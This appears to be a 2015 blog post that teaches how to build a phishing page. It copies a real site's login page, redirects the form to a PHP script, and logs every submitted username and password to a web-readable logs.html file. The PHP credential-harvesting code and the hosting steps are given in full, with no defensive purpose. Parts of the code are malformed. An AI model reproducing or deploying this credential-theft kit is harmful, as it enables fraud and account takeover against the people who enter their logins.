Thursday, 10 December 2015

How to make phihsing page of any site on internet.?

How to make phishing page of any site.?

Hello, I'm here to make a small Tutorial that how you Make Phishing Page of any Site!!


OK so lets get started...



how-to-make-phihsing-page-of -any-site
Make phishing page of any site


                                     TAKING SOURCE:

  •   go on the site's Login page which you will use as your Phishing page. Right click on site and Click "View Page Source" Click on the Source box and Press CTRL + A to Select all source. Now we have the page source. Now make a file name it index.php!

                     Making Phishing page Work:

       To make phishing page work, I'll explain below.
  • Make a file index.php and copy the Source code of site you want to Phish.
  • Now edit the phishing page and Press CTRL + F and find action= or action 
  • Now Replacing the URL type action.php it might look like this:

                                                                            Code:
                               action="action.php"



                      Keywords Copier:

  • Now make a file call it action.php and Copy the source code below and paste in it.

                                   Code:
header("Location: http://www.facebook.com");
$handle = fopen("logs.html", "a");
foreach($_POST as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fwrite($handle, "
");
fclose($handle);
exit;
?>

  • Now, make a empty file call it logs.html , Now when you are done upload these all files to your webhost open the index.php and for testing type in random username/email and pass. now open the logs.html in your site http://www.forexample.com/logs.html and you'll see all the info over there! Thats it end of tutorial Smile....

2 comments: